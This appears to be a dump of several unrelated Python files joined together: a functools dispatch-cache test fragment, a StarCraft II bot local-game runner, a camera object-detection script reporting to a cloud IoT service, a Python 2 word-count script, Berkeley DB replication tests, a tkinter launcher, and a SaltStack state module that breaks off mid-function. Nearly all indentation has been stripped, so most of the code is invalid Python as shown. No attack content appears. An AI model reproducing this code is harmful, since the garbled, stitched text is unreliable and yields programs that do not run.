self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict])
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
self.assertEqual(g(l), "list")
self.assertEqual(g(d), "sized")
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
g.dispatch(list)
g.dispatch(dict)
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict,
list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
c.MutableSet.register(X) # Will invalidate the cache.
self.assertEqual(len(td), 2) # Stale cache.
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 1)
g.register(c.MutableMapping, lambda arg: "mutablemapping")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(len(td), 1)
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
g.register(dict, lambda arg: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
g._clear_cache()
self.assertEqual(len(td), 0)
functools.WeakKeyDictionary = _orig_wkd
if __name__ == '__main__':
unittest.main()
|
custom_run_local.py
|
import asyncio
import subprocess
from multiprocessing import Process
import os
import json
from typing import List, Set
from pathlib import Path
from collections import deque
from arenaclient.proxy.frontend import GameRunner
from arenaclient.proxy.server import run_server
class RunLocal:
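    """Run bot games locally through the arenaclient proxy.

    On Windows the proxy server is started in a child process; games added to
    the queue are played one by one through GameRunner. Intended for use as a
    context manager (see main() below).
    """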
def __init__(self):
self.server_process = None
# Realtime and visualize setting, e.g. {"Realtime": False, "Visualize": False}
self.data = {}
# List of games, e.g. ["basic_bot,T,python,loser_bot,T,python,AcropolisLE"]
self.games_queue = deque()
self.runner = GameRunner()
def start_server(self):
if os.name == "nt":
            # Windows-only for now; on Linux, comment out the os.name check above. TODO: use the platform module instead of os.name.
self.server_process = Process(target=run_server, args=[False])
self.server_process.daemon = True
self.server_process.start()
def stop_server(self):
if os.name == "nt":
self.server_process.terminate()
def __enter__(self):
self.start_server()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop_server()
def add_games_to_queue(self, games: List[str]):
for game in games:
self.games_queue.append(game)
def read_ladderbots(self, directory: Path, exclude_names: Set[str]):
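        """Collect "name,race,type" strings from each bot directory's ladderbots.json, skipping bot names listed (lowercase) in exclude_names."""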
botdir: Path
bots: List[str] = []
for botdir in [x for x in directory.iterdir() if x.is_dir()]:
for file in [x for x in botdir.iterdir() if x.is_file()]:
if str(file).endswith("ladderbots.json"):
with open(str(file)) as f:
contents = json.load(f)
bots_data: dict = contents["Bots"]
for bot_name, bot_data in bots_data.items():
if bot_name.lower() in exclude_names:
continue
bot_race = bot_data["Race"][0]
bot_type = bot_data["Type"]
bots.append(",".join([bot_name, bot_race, bot_type]))
break
return bots
def generate_games_list(self, bot1_list: List[str], bot2_list: List[str], map_list: List[str]) -> List[str]:
"""
        Generate the games list: every bot from 'bot1_list' is matched against every bot from 'bot2_list' on every map in 'map_list'.
        Example input:
        generate_games_list(["CreepyBot,Z,python"], ["basic_bot,T,python", "loser_bot,T,python"], ["AcropolisLE", "TritonLE"])
"""
games = []
for bot1_string in bot1_list:
for bot2_string in bot2_list:
for map_name in map_list:
games.append(",".join([bot1_string, bot2_string, map_name]))
return games
async def run_local_games(self):
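        """Pop queued games one at a time and run each through the GameRunner proxy."""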
while self.games_queue:
games = [self.games_queue.popleft()]
await self.runner.run_local_game(games, self.data)
async def main():
# Alternatively you can use start_server() and stop_server()
with RunLocal() as run_local:
# Not needed, default: realtime=False and visualize=False
run_local.data = {"Realtime": False, "Visualize": False}
# If you want to let your bot play vs multiple bots, edit the following
# path = Path("/root") / "StarCraftII" / "Bots"
# bot1_list = ["CreepyBot,Z,python"]
# bot2_list = run_local.read_ladderbots(path, exclude_names={"creepybot", "basic_bot", "loser_bot"})
# print(f"Generated bot2_list: {bot2_list}")
bot1_list = ["loser_bot,Z,python"]
bot2_list = ["basic_bot,Z,python"]
map_list = ["TritonLE"]
"""
"python": ["run.py", "Python"],
"cppwin32": [f"{bot_name}.exe", "Wine"],
"cpplinux": [f"{bot_name}", "BinaryCpp"],
"dotnetcore": [f"{bot_name}.dll", "DotNetCore"],
"java": [f"{bot_name}.jar", "Java"],
"nodejs": ["main.jar", "NodeJS"],
"Python": ["run.py", "Python"],
"Wine": [f"{bot_name}.exe", "Wine"],
"BinaryCpp": [f"{bot_name}", "BinaryCpp"],
"DotNetCore": [f"{bot_name}.dll", "DotNetCore"],
"Java": [f"{bot_name}.jar", "Java"],
"NodeJS": ["main.jar", "NodeJS"],
"""
# Generates all possible map and bot combinations
games = run_local.generate_games_list(bot1_list, bot2_list, map_list)
# If you only want to play a specific game:
# games = ["basic_bot,T,python,loser_bot,T,python,AcropolisLE"]
# Add games to queue
run_local.add_games_to_queue(games)
await run_local.run_local_games()
if __name__ == "__main__":
asyncio.run(main())
|
detect_obj.py
|
import sys
import cv2
import time
from multiprocessing import Process
from multiprocessing import Queue
from PIL import Image
from screen import Screen
from camera import MyCamera, RawCapture
from labels import Labels
from classify import classify_frame
from display import set_window, set_bonding_box, set_label, set_label_text, display_show, display_destroy
from iot_watson import IoT
# Misc vars
queuepulls = 0.0
detections = 0
label_txt = None
fps = 0.0
qfps = 0.0
confThreshold = 0.75
# -------------------------------------------SCREEN SIZE-------------------------------------------------------------
screen = Screen()
# -------------------------------------------------------------------------------------------------------------------
# --------------------------------------------CAMERA-----------------------------------------------------------------
# Initialize the camera and grab a reference to the raw camera capture
camera = MyCamera(screen.resolution.width, screen.resolution.height)
rawCapture = RawCapture(camera.my_camera, screen.resolution.width, screen.resolution.height)
# -------------------------------------------------------------------------------------------------------------------
# ---------------------------------------------OD LABELS-------------------------------------------------------------
labels = Labels()
# -------------------------------------------------------------------------------------------------------------------
# noinspection PyBroadException
try:
# -----------------------------------DISPLAY WINDOW--------------------------------------------------------------
set_window(screen.resolution.width, screen.resolution.height)
# ---------------------------------------------------------------------------------------------------------------
# ----------------------------------INPUT(FRAME)/OUTPUT(RESULT DATA)---------------------------------------------
# Initialize the input queue (frames), output queue (out),
# and the list of actual detections returned by the detection thread
inputQueue = Queue(maxsize=1)
outputQueue = Queue(maxsize=1)
img = None
out = None
# ---------------------------------------------------------------------------------------------------------------
# ---------------------------------DETECTION THREAD--------------------------------------------------------------
    # Create the detection worker (a separate process) to run independently of the main capture loop
detection_thread = Process(target=classify_frame, args=(inputQueue, outputQueue,))
detection_thread.daemon = True
detection_thread.start()
# ---------------------------------------------------------------------------------------------------------------
# ---------------------------------IoT---------------------------------------------------------------------------
# Connect to cloud
iot = IoT()
# ---------------------------------------------------------------------------------------------------------------
# ----------------------------------FRAME RATE-------------------------------------------------------------------
timer1 = time.time()
frames = 0
queuepulls = 0
timer2 = 0.
t2secs = 0.
# ---------------------------------------------------------------------------------------------------------------
# ----------------------------------CAMERA FRAMES----------------------------------------------------------------
for frame in camera.my_camera.capture_continuous(rawCapture.rawCapture, format="bgr", use_video_port=True):
if queuepulls == 1:
timer2 = time.time()
# Capture frame-by-frame
frame = frame.array
img = Image.fromarray(frame)
# If the input queue is empty, give the current frame to CLASSIFICATION
if inputQueue.empty():
inputQueue.put(img)
# If the output queue is not empty, grab the CLASSIFICATION result
if not outputQueue.empty():
out = outputQueue.get()
# Use CLASSIFICATION data
if out is not None:
# Loop over the detections
for detection in out:
if detection[0] == 0 or detection[0] == 16 or detection[0] == 17:
objID = detection[0]
label_txt = labels.my_labels[objID]
confidence = detection[1]
xmin = detection[2]
ymin = detection[3]
xmax = detection[4]
ymax = detection[5]
if confidence > confThreshold:
set_bonding_box(frame, xmin, xmax, ymin, ymax)
set_label(frame, label_txt, xmin, ymin)
set_label_text(frame, label_txt, confidence, xmin, ymin)
                        # Positive detection flag for this frame, not a per-object count
detections = True
else:
detections = False
label_txt = None
queuepulls += 1
# Display the resulting frame
display_show(frame, screen.resolution.width, screen.resolution.height)
# -----------------------------------------------------------------------------------------------------------
# FPS calculation
frames += 1
if frames >= 1:
end1 = time.time()
t1secs = end1 - timer1
fps = round(frames / t1secs, 2)
if queuepulls > 1:
end2 = time.time()
t2secs = end2 - timer2
qfps = round(queuepulls / t2secs, 2)
iot.send_data(fps, detections, label_txt)
# Clear the stream in preparation for the next frame
rawCapture.rawCapture.truncate(0)
# ------------------------------------CONTROLS---------------------------------------------------------------
keyPress = cv2.waitKey(1)
if keyPress == 113: # q
break
if keyPress == 82: # R
confThreshold += 0.1
if keyPress == 84: # T
confThreshold -= 0.1
if confThreshold > 1:
confThreshold = 1
if confThreshold < 0.4:
confThreshold = 0.4
# ----------------------------------------------------------------------------------------------------------
# ----------------------------------------CLOSE WINDOW AND CAMERA-----------------------------------------------
display_destroy()
camera.my_camera.close()
iot.disconnect_client()
except:
print("Unexpected error:", sys.exc_info()[0])
display_destroy()
camera.my_camera.close()
|
manager.py
|
import os
import sys
import time
from collections import defaultdict
from multiprocessing import Process, Lock, Manager
processes = [ ]
file = open('article', mode = 'r')
lines = file.read().split('.')
file.close()
manager = Manager()
bag = manager.dict()
lock = manager.Lock()
delims = manager.list([',', ';', ':', '-', '.'])
def bag_of_words(line, lock, bag, delims):
    # Build a local word count for one sentence, then merge it into the shared bag under the lock.
    my_dict = defaultdict(int)
    for delim in delims:
        line = line.replace(delim, ' ')
    for word in line.split():
        my_dict[word] += 1
    lock.acquire()
    for key, value in my_dict.iteritems():
        try:
            bag[key] += value
        except KeyError:
            bag[key] = value
    lock.release()
time1 = time.time()
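# One worker process per sentence; each merges its counts into the manager-backed shared dict.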
for line in lines:
p = Process(target=bag_of_words, args=(line, lock, bag, delims,))
processes.append(p)
p.start()
for p in processes:
p.join()
time2 = time.time() - time1
print bag
print("Time = {0}".format(time2))
|
test_replication.py
|
"""TestCases for distributed transactions.
"""
import os
import time
import unittest
from test_all import db, test_support, have_threads, verbose, \
get_new_environment_path, get_new_database_path
#----------------------------------------------------------------------
class DBReplicationManager(unittest.TestCase):
import sys
if sys.version_info[:3] < (2, 4, 0):
def assertTrue(self, expr, msg=None):
self.failUnless(expr,msg=msg)
def setUp(self) :
self.homeDirMaster = get_new_environment_path()
self.homeDirClient = get_new_environment_path()
self.dbenvMaster = db.DBEnv()
self.dbenvClient = db.DBEnv()
# Must use "DB_THREAD" because the Replication Manager will
# be executed in other threads but will use the same environment.
# http://forums.oracle.com/forums/thread.jspa?threadID=645788&tstart=0
self.dbenvMaster.open(self.homeDirMaster, db.DB_CREATE | db.DB_INIT_TXN
| db.DB_INIT_LOG | db.DB_INIT_MPOOL | db.DB_INIT_LOCK |
db.DB_INIT_REP | db.DB_RECOVER | db.DB_THREAD, 0666)
self.dbenvClient.open(self.homeDirClient, db.DB_CREATE | db.DB_INIT_TXN
| db.DB_INIT_LOG | db.DB_INIT_MPOOL | db.DB_INIT_LOCK |
db.DB_INIT_REP | db.DB_RECOVER | db.DB_THREAD, 0666)
self.confirmed_master=self.client_startupdone=False
def confirmed_master(a,b,c) :
if b==db.DB_EVENT_REP_MASTER :
self.confirmed_master=True
def client_startupdone(a,b,c) :
if b==db.DB_EVENT_REP_STARTUPDONE :
self.client_startupdone=True
self.dbenvMaster.set_event_notify(confirmed_master)
self.dbenvClient.set_event_notify(client_startupdone)
#self.dbenvMaster.set_verbose(db.DB_VERB_REPLICATION, True)
#self.dbenvMaster.set_verbose(db.DB_VERB_FILEOPS_ALL, True)
#self.dbenvClient.set_verbose(db.DB_VERB_REPLICATION, True)
#self.dbenvClient.set_verbose(db.DB_VERB_FILEOPS_ALL, True)
self.dbMaster = self.dbClient = None
def tearDown(self):
if self.dbClient :
self.dbClient.close()
if self.dbMaster :
self.dbMaster.close()
self.dbenvClient.close()
self.dbenvMaster.close()
test_support.rmtree(self.homeDirClient)
test_support.rmtree(self.homeDirMaster)
def test01_basic_replication(self) :
master_port = test_support.find_unused_port()
self.dbenvMaster.repmgr_set_local_site("127.0.0.1", master_port)
client_port = test_support.find_unused_port()
self.dbenvClient.repmgr_set_local_site("127.0.0.1", client_port)
self.dbenvMaster.repmgr_add_remote_site("127.0.0.1", client_port)
self.dbenvClient.repmgr_add_remote_site("127.0.0.1", master_port)
self.dbenvMaster.rep_set_nsites(2)
self.dbenvClient.rep_set_nsites(2)
self.dbenvMaster.rep_set_priority(10)
self.dbenvClient.rep_set_priority(0)
self.dbenvMaster.rep_set_timeout(db.DB_REP_CONNECTION_RETRY,100123)
self.dbenvClient.rep_set_timeout(db.DB_REP_CONNECTION_RETRY,100321)
self.assertEquals(self.dbenvMaster.rep_get_timeout(
db.DB_REP_CONNECTION_RETRY), 100123)
self.assertEquals(self.dbenvClient.rep_get_timeout(
db.DB_REP_CONNECTION_RETRY), 100321)
self.dbenvMaster.rep_set_timeout(db.DB_REP_ELECTION_TIMEOUT, 100234)
self.dbenvClient.rep_set_timeout(db.DB_REP_ELECTION_TIMEOUT, 100432)
self.assertEquals(self.dbenvMaster.rep_get_timeout(
db.DB_REP_ELECTION_TIMEOUT), 100234)
self.assertEquals(self.dbenvClient.rep_get_timeout(
db.DB_REP_ELECTION_TIMEOUT), 100432)
self.dbenvMaster.rep_set_timeout(db.DB_REP_ELECTION_RETRY, 100345)
self.dbenvClient.rep_set_timeout(db.DB_REP_ELECTION_RETRY, 100543)
self.assertEquals(self.dbenvMaster.rep_get_timeout(
db.DB_REP_ELECTION_RETRY), 100345)
self.assertEquals(self.dbenvClient.rep_get_timeout(
db.DB_REP_ELECTION_RETRY), 100543)
self.dbenvMaster.repmgr_set_ack_policy(db.DB_REPMGR_ACKS_ALL)
self.dbenvClient.repmgr_set_ack_policy(db.DB_REPMGR_ACKS_ALL)
self.dbenvMaster.repmgr_start(1, db.DB_REP_MASTER);
self.dbenvClient.repmgr_start(1, db.DB_REP_CLIENT);
self.assertEquals(self.dbenvMaster.rep_get_nsites(),2)
self.assertEquals(self.dbenvClient.rep_get_nsites(),2)
self.assertEquals(self.dbenvMaster.rep_get_priority(),10)
self.assertEquals(self.dbenvClient.rep_get_priority(),0)
self.assertEquals(self.dbenvMaster.repmgr_get_ack_policy(),
db.DB_REPMGR_ACKS_ALL)
self.assertEquals(self.dbenvClient.repmgr_get_ack_policy(),
db.DB_REPMGR_ACKS_ALL)
# The timeout is necessary in BDB 4.5, since DB_EVENT_REP_STARTUPDONE
# is not generated if the master has no new transactions.
# This is solved in BDB 4.6 (#15542).
import time
timeout = time.time()+10
while (time.time()<timeout) and not (self.confirmed_master and self.client_startupdone) :
time.sleep(0.02)
# this fails on Windows as self.client_startupdone never gets set
# to True - see bug 3892. BUT - even though this assertion
        # fails on Windows, the rest of the test passes - so to prove
        # that, we let the rest of the test run. Sadly we can't
# make use of raising TestSkipped() here (unittest still
# reports it as an error), so we yell to stderr.
import sys
if sys.platform=="win32":
print >> sys.stderr, \
"XXX - windows bsddb replication fails on windows and is skipped"
print >> sys.stderr, "XXX - Please see issue #3892"
else:
self.assertTrue(time.time()<timeout)
d = self.dbenvMaster.repmgr_site_list()
self.assertEquals(len(d), 1)
self.assertEquals(d[0][0], "127.0.0.1")
self.assertEquals(d[0][1], client_port)
self.assertTrue((d[0][2]==db.DB_REPMGR_CONNECTED) or \
(d[0][2]==db.DB_REPMGR_DISCONNECTED))
d = self.dbenvClient.repmgr_site_list()
self.assertEquals(len(d), 1)
self.assertEquals(d[0][0], "127.0.0.1")
self.assertEquals(d[0][1], master_port)
self.assertTrue((d[0][2]==db.DB_REPMGR_CONNECTED) or \
(d[0][2]==db.DB_REPMGR_DISCONNECTED))
if db.version() >= (4,6) :
d = self.dbenvMaster.repmgr_stat(flags=db.DB_STAT_CLEAR);
self.assertTrue("msgs_queued" in d)
self.dbMaster=db.DB(self.dbenvMaster)
txn=self.dbenvMaster.txn_begin()
self.dbMaster.open("test", db.DB_HASH, db.DB_CREATE, 0666, txn=txn)
txn.commit()
import time,os.path
timeout=time.time()+10
while (time.time()<timeout) and \
not (os.path.exists(os.path.join(self.homeDirClient,"test"))) :
time.sleep(0.01)
self.dbClient=db.DB(self.dbenvClient)
while True :
txn=self.dbenvClient.txn_begin()
try :
self.dbClient.open("test", db.DB_HASH, flags=db.DB_RDONLY,
mode=0666, txn=txn)
except db.DBRepHandleDeadError :
txn.abort()
self.dbClient.close()
self.dbClient=db.DB(self.dbenvClient)
continue
txn.commit()
break
txn=self.dbenvMaster.txn_begin()
self.dbMaster.put("ABC", "123", txn=txn)
txn.commit()
import time
timeout=time.time()+10
v=None
while (time.time()<timeout) and (v==None) :
txn=self.dbenvClient.txn_begin()
v=self.dbClient.get("ABC", txn=txn)
txn.commit()
if v==None :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
self.assertEquals("123", v)
txn=self.dbenvMaster.txn_begin()
self.dbMaster.delete("ABC", txn=txn)
txn.commit()
timeout=time.time()+10
while (time.time()<timeout) and (v!=None) :
txn=self.dbenvClient.txn_begin()
v=self.dbClient.get("ABC", txn=txn)
txn.commit()
if v==None :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
self.assertEquals(None, v)
class DBBaseReplication(DBReplicationManager):
def setUp(self) :
DBReplicationManager.setUp(self)
def confirmed_master(a,b,c) :
if (b == db.DB_EVENT_REP_MASTER) or (b == db.DB_EVENT_REP_ELECTED) :
self.confirmed_master = True
def client_startupdone(a,b,c) :
if b == db.DB_EVENT_REP_STARTUPDONE :
self.client_startupdone = True
self.dbenvMaster.set_event_notify(confirmed_master)
self.dbenvClient.set_event_notify(client_startupdone)
import Queue
self.m2c = Queue.Queue()
self.c2m = Queue.Queue()
            # There are only two nodes, so we don't need to
            # make any routing decisions
def m2c(dbenv, control, rec, lsnp, envid, flags) :
self.m2c.put((control, rec))
def c2m(dbenv, control, rec, lsnp, envid, flags) :
self.c2m.put((control, rec))
self.dbenvMaster.rep_set_transport(13,m2c)
self.dbenvMaster.rep_set_priority(10)
self.dbenvClient.rep_set_transport(3,c2m)
self.dbenvClient.rep_set_priority(0)
self.assertEquals(self.dbenvMaster.rep_get_priority(),10)
self.assertEquals(self.dbenvClient.rep_get_priority(),0)
#self.dbenvMaster.set_verbose(db.DB_VERB_REPLICATION, True)
#self.dbenvMaster.set_verbose(db.DB_VERB_FILEOPS_ALL, True)
#self.dbenvClient.set_verbose(db.DB_VERB_REPLICATION, True)
#self.dbenvClient.set_verbose(db.DB_VERB_FILEOPS_ALL, True)
def thread_master() :
return self.thread_do(self.dbenvMaster, self.c2m, 3,
self.master_doing_election, True)
def thread_client() :
return self.thread_do(self.dbenvClient, self.m2c, 13,
self.client_doing_election, False)
from threading import Thread
t_m=Thread(target=thread_master)
t_c=Thread(target=thread_client)
import sys
if sys.version_info[0] < 3 :
t_m.setDaemon(True)
t_c.setDaemon(True)
else :
t_m.daemon = True
t_c.daemon = True
self.t_m = t_m
self.t_c = t_c
self.dbMaster = self.dbClient = None
self.master_doing_election=[False]
self.client_doing_election=[False]
def tearDown(self):
if self.dbClient :
self.dbClient.close()
if self.dbMaster :
self.dbMaster.close()
self.m2c.put(None)
self.c2m.put(None)
self.t_m.join()
self.t_c.join()
self.dbenvClient.close()
self.dbenvMaster.close()
test_support.rmtree(self.homeDirClient)
test_support.rmtree(self.homeDirMaster)
def basic_rep_threading(self) :
self.dbenvMaster.rep_start(flags=db.DB_REP_MASTER)
self.dbenvClient.rep_start(flags=db.DB_REP_CLIENT)
def thread_do(env, q, envid, election_status, must_be_master) :
while True :
v=q.get()
if v == None : return
env.rep_process_message(v[0], v[1], envid)
self.thread_do = thread_do
self.t_m.start()
self.t_c.start()
def test01_basic_replication(self) :
self.basic_rep_threading()
# The timeout is necessary in BDB 4.5, since DB_EVENT_REP_STARTUPDONE
# is not generated if the master has no new transactions.
# This is solved in BDB 4.6 (#15542).
import time
timeout = time.time()+10
while (time.time()<timeout) and not (self.confirmed_master and
self.client_startupdone) :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
self.dbMaster=db.DB(self.dbenvMaster)
txn=self.dbenvMaster.txn_begin()
self.dbMaster.open("test", db.DB_HASH, db.DB_CREATE, 0666, txn=txn)
txn.commit()
import time,os.path
timeout=time.time()+10
while (time.time()<timeout) and \
not (os.path.exists(os.path.join(self.homeDirClient,"test"))) :
time.sleep(0.01)
self.dbClient=db.DB(self.dbenvClient)
while True :
txn=self.dbenvClient.txn_begin()
try :
self.dbClient.open("test", db.DB_HASH, flags=db.DB_RDONLY,
mode=0666, txn=txn)
except db.DBRepHandleDeadError :
txn.abort()
self.dbClient.close()
self.dbClient=db.DB(self.dbenvClient)
continue
txn.commit()
break
txn=self.dbenvMaster.txn_begin()
self.dbMaster.put("ABC", "123", txn=txn)
txn.commit()
import time
timeout=time.time()+10
v=None
while (time.time()<timeout) and (v==None) :
txn=self.dbenvClient.txn_begin()
v=self.dbClient.get("ABC", txn=txn)
txn.commit()
if v==None :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
self.assertEquals("123", v)
txn=self.dbenvMaster.txn_begin()
self.dbMaster.delete("ABC", txn=txn)
txn.commit()
timeout=time.time()+10
while (time.time()<timeout) and (v!=None) :
txn=self.dbenvClient.txn_begin()
v=self.dbClient.get("ABC", txn=txn)
txn.commit()
if v==None :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
self.assertEquals(None, v)
if db.version() >= (4,7) :
def test02_test_request(self) :
self.basic_rep_threading()
(minimum, maximum) = self.dbenvClient.rep_get_request()
self.dbenvClient.rep_set_request(minimum-1, maximum+1)
self.assertEqual(self.dbenvClient.rep_get_request(),
(minimum-1, maximum+1))
if db.version() >= (4,6) :
def test03_master_election(self) :
# Get ready to hold an election
#self.dbenvMaster.rep_start(flags=db.DB_REP_MASTER)
self.dbenvMaster.rep_start(flags=db.DB_REP_CLIENT)
self.dbenvClient.rep_start(flags=db.DB_REP_CLIENT)
def thread_do(env, q, envid, election_status, must_be_master) :
while True :
v=q.get()
if v == None : return
r = env.rep_process_message(v[0],v[1],envid)
if must_be_master and self.confirmed_master :
self.dbenvMaster.rep_start(flags = db.DB_REP_MASTER)
must_be_master = False
if r[0] == db.DB_REP_HOLDELECTION :
def elect() :
while True :
try :
env.rep_elect(2, 1)
election_status[0] = False
break
except db.DBRepUnavailError :
pass
if not election_status[0] and not self.confirmed_master :
from threading import Thread
election_status[0] = True
t=Thread(target=elect)
import sys
if sys.version_info[0] < 3 :
t.setDaemon(True)
else :
t.daemon = True
t.start()
self.thread_do = thread_do
self.t_m.start()
self.t_c.start()
self.dbenvMaster.rep_set_timeout(db.DB_REP_ELECTION_TIMEOUT, 50000)
self.dbenvClient.rep_set_timeout(db.DB_REP_ELECTION_TIMEOUT, 50000)
self.client_doing_election[0] = True
while True :
try :
self.dbenvClient.rep_elect(2, 1)
self.client_doing_election[0] = False
break
except db.DBRepUnavailError :
pass
self.assertTrue(self.confirmed_master)
#----------------------------------------------------------------------
def test_suite():
suite = unittest.TestSuite()
if db.version() >= (4, 6) :
dbenv = db.DBEnv()
try :
dbenv.repmgr_get_ack_policy()
ReplicationManager_available=True
except :
ReplicationManager_available=False
dbenv.close()
del dbenv
if ReplicationManager_available :
suite.addTest(unittest.makeSuite(DBReplicationManager))
if have_threads :
suite.addTest(unittest.makeSuite(DBBaseReplication))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
|
main_program.py
|
import tkinterGUI
import voiceRecognition
import threading
class main_program():
def __init__(self):
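        # Run the voice-recognition loop and the Tk GUI concurrently, each in
        # its own thread, so neither blocks the other.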
        voice_thread = threading.Thread(target=voiceRecognition.main, args=())
        gui_thread = threading.Thread(target=tkinterGUI.GUIapp, args=())
        print ("starting")
voice_thread.start()
print ("between statements")
gui_thread.start()
print ("in between")
#voice_thread.join()
#print ("ending statements")
#gui_thread.join()
main_program()
|
saltmod.py
|
# -*- coding: utf-8 -*-
'''
Control the Salt command interface
==================================
This state is intended for use from the Salt Master. It provides access to
sending commands down to minions as well as access to executing master-side
modules. These state functions wrap Salt's :ref:`Python API <python-api>`.
.. versionadded:: 2016.11.0
Support for masterless minions was added to the ``salt.state`` function,
so they can run orchestration sls files. This is particularly useful when
the rendering of a state is dependent on the execution of another state.
Orchestration will render and execute each orchestration block
independently, while honoring requisites to ensure the states are applied
in the correct order.
.. seealso:: More Orchestrate documentation
* :ref:`Full Orchestrate Tutorial <orchestrate-runner>`
* :py:func:`The Orchestrate runner <salt.runners.state.orchestrate>`
'''
from __future__ import absolute_import, unicode_literals, print_function
# Import python libs
import fnmatch
import logging
import sys
import threading
import time
# Import salt libs
import salt.syspaths
import salt.exceptions
import salt.output
import salt.utils.data
import salt.utils.event
from salt.ext import six
log = logging.getLogger(__name__)
# Define the module's virtual name
__virtualname__ = 'salt'
def __virtual__():
'''
Named salt
'''
return __virtualname__
def _fire_args(tag_data):
try:
salt.utils.event.fire_args(__opts__,
__orchestration_jid__,
tag_data,
'run')
except NameError:
log.debug(
'Unable to fire args event due to missing __orchestration_jid__'
)
def _parallel_map(func, inputs):
'''
Applies a function to each element of a list, returning the resulting list.
A separate thread is created for each element in the input list and the
passed function is called for each of the elements. When all threads have
finished execution a list with the results corresponding to the inputs is
returned.
If one of the threads fails (because the function throws an exception),
that exception is reraised. If more than one thread fails, the exception
from the first thread (according to the index of the input element) is
reraised.
func:
function that is applied on each input element.
inputs:
list of elements that shall be processed. The length of this list also
defines the number of threads created.
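
    A minimal usage sketch (illustrative only, with made-up inputs):

    .. code-block:: python

        squares = _parallel_map(lambda x: x * x, [1, 2, 3])
        # squares == [1, 4, 9]; if any call had raised, the exception from the
        # lowest-indexed failing input would be re-raised after all threads join.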
'''
outputs = len(inputs) * [None]
errors = len(inputs) * [None]
def create_thread(index):
def run_thread():
try:
outputs[index] = func(inputs[index])
except: # pylint: disable=bare-except
errors[index] = sys.exc_info()
thread = threading.Thread(target=run_thread)
thread.start()
return thread
threads = list(six.moves.map(create_thread, six.moves.range(len(inputs))))
for thread in threads:
thread.join()
for error in errors:
if error is not None:
exc_type, exc_value, exc_traceback = error
six.reraise(exc_type, exc_value, exc_traceback)
return outputs
def state(name,
tgt,
ssh=False,
tgt_type='glob',
ret='',
ret_config=None,
ret_kwargs=None,
highstate=None,
sls=None,
top=None,
saltenv=None,
test=None,
pillar=None,
pillarenv=None,
expect_minions=True,
fail_minions=None,
allow_fail=0,
exclude=None,
concurrent=False,
timeout=None,
batch=None,
queue=False,
subset=None,
orchestration_jid=None,
**kwargs):
'''
Invoke a state run on a given target
name
An arbitrary name used to track the state execution
tgt
The target specification for the state run.
        .. versionadded:: 2016.11.0
Masterless support: When running on a masterless minion, the ``tgt``
is ignored and will always be the local minion.
tgt_type
The target type to resolve, defaults to ``glob``
ret
Optionally set a single or a list of returners to use
ret_config
Use an alternative returner configuration
ret_kwargs
Override individual returner configuration items
highstate
Defaults to None, if set to True the target systems will ignore any
sls references specified in the sls option and call state.highstate
on the targeted minions
top
Should be the name of a top file. If set state.top is called with this
top file instead of state.sls.
sls
A group of sls files to execute. This can be defined as a single string
containing a single sls file, or a list of sls files
test
Pass ``test=true`` or ``test=false`` through to the state function. This
        can be used to override a test mode set in the minion's config file. If
left as the default of None and the 'test' mode is supplied on the
command line, that value is passed instead.
pillar
Pass the ``pillar`` kwarg through to the state function
pillarenv
The pillar environment to grab pillars from
.. versionadded:: 2017.7.0
saltenv
The default salt environment to pull sls files from
ssh
Set to `True` to use the ssh client instead of the standard salt client
roster
In the event of using salt-ssh, a roster system can be set
expect_minions
An optional boolean for failing if some minions do not respond
fail_minions
An optional list of targeted minions where failure is an option
allow_fail
Pass in the number of minions to allow for failure before setting
the result of the execution to False
exclude
Pass exclude kwarg to state
concurrent
Allow multiple state runs to occur at once.
WARNING: This flag is potentially dangerous. It is designed
        for use when multiple state runs can safely be run at the same time.
        Do not use this flag for performance optimization.
queue
Pass ``queue=true`` through to the state function
batch
Execute the command :ref:`in batches <targeting-batch>`. E.g.: ``10%``.
.. versionadded:: 2016.3.0
subset
Number of minions from the targeted set to randomly use
.. versionadded:: 2017.7.0
asynchronous
Run the salt command but don't wait for a reply.
NOTE: This flag conflicts with subset and batch flags and cannot be
used at the same time.
.. versionadded:: neon
Examples:
Run a list of sls files via :py:func:`state.sls <salt.state.sls>` on target
minions:
.. code-block:: yaml
webservers:
salt.state:
- tgt: 'web*'
- sls:
- apache
- django
- core
- saltenv: prod
Run sls file via :py:func:`state.sls <salt.state.sls>` on target
minions with exclude:
.. code-block:: yaml
docker:
salt.state:
- tgt: 'docker*'
- sls: docker
- exclude: docker.swarm
- saltenv: prod
Run a full :py:func:`state.highstate <salt.state.highstate>` on target
    minions.
.. code-block:: yaml
databases:
salt.state:
- tgt: role:database
- tgt_type: grain
- highstate: True
'''
cmd_kw = {'arg': [], 'kwarg': {}, 'ret': ret, 'timeout': timeout}
if ret_config:
cmd_kw['ret_config'] = ret_config
if ret_kwargs:
cmd_kw['ret_kwargs'] = ret_kwargs
state_ret = {'name': name,
'changes': {},
'comment': '',
'result': True}
try:
allow_fail = int(allow_fail)
except ValueError:
state_ret['result'] = False
state_ret['comment'] = 'Passed invalid value for \'allow_fail\', must be an int'
return state_ret
cmd_kw['tgt_type'] = tgt_type
cmd_kw['ssh'] = ssh
if 'roster' in kwargs:
cmd_kw['roster'] = kwargs['roster']
cmd_kw['expect_minions'] = expect_minions
cmd_kw['asynchronous'] = kwargs.pop('asynchronous', False)
if highstate:
fun = 'state.highstate'
elif top:
fun = 'state.top'
cmd_kw['arg'].append(top)
elif sls:
fun = 'state.sls'
if isinstance(sls, list):
sls = ','.join(sls)
cmd_kw['arg'].append(sls)
else:
